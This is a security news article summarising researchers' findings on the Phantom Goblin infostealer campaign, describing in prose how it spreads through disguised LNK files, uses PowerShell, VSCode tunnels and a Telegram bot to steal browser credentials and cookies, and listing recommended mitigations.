The infostealer threat continues apace with everything from fake CAPTCHA tests and even Mac computers being used to steal data that has resulted in small business access being available for $600 on the dark web, and hundreds of millions of compromised passwords put up for sale. Now security researchers have uncovered a new threat in the infostealer armory, the Phantom Goblin that can glide around browser security protections. Here’s what you need to know.
The Phantom Goblin Infostealer Threat Unmasked
Although there is a lot that is very familiar when it comes to the newly discovered Phantom Goblin infostealer campaign, putting these recognisable attack components together in the way they have been, threat actors have come up with a very dangerous concoction that can bypass browser protections to steal credentials and cookies.
So, while there’s nothing particularly shocking about the use of social engineering or phishing tactics to persuade a victim to execute a malicious file disguised as a PDF document, or leveraging PowerShell to download and execute commands, or even establish VSCode tunnels and maintain ongoing access to exfiltrate sensitive information by way of a Telegram bot, ignoring the latest discovery would be a stupid thing to do when there is so much at stake.
Researchers at Cyble said that the Phantom Goblin campaign is distributing its infostealer malware through attachments compressed using the proprietary RAR format, and then tricking users into executing a malicious file using the Windows LNK shortcut and disguised as a legitimate PDF document. “Once executed,” Cyble said, “this LNK file triggers a PowerShell command that retrieves additional payloads from a GitHub repository, allowing the malware to perform various malicious activities while operating stealthily.” Interestingly, a number of 10-second delays are built into the attack process, before the PowerShell script launches a “code.exe” execution iin a hidden window and then again before reading the contents of the output.txt file.
Infostealer Bypasses Browser Security Protections
According to the Cyble report, Phantom Goblin will forcefully terminate browser processes and leverages Visual Studio Code tunnels to enable the attackers to control now compromised systems without triggering security alerts. “By disguising itself as legitimate applications,” the researchers explained, “the malware effectively bypasses detection while exfiltrating stolen data through a Telegram bot.”
As part of this security protections evading process, Phantom Goblin exploits legitimate and trusted tools including PowerShell and GitHub to blend “its activities into normal system operations,” and extract data that includes login credentials, cookies and browsing history. That exfiltrated data is first archived into compressed files making it harder for traditional security solutions to detect and block the infostealer attack.
Cyble researchers recommended that to mitigate the Phantom Goblin infostealer, you should avoid opening unexpected RAR, ZIP, or LNK files, even if they appear to come from trusted contacts, without verifying the source. Users are also advised to enable advanced email filtering to block potentially malicious attachments and ensure all attachments are scanned with updated security solutions before execution. Implementing strict browser security policies and access controls to prevent unauthorized debugging is also recommended where possible, alongside the restricted use of PowerShell and script execution on end-user systems.
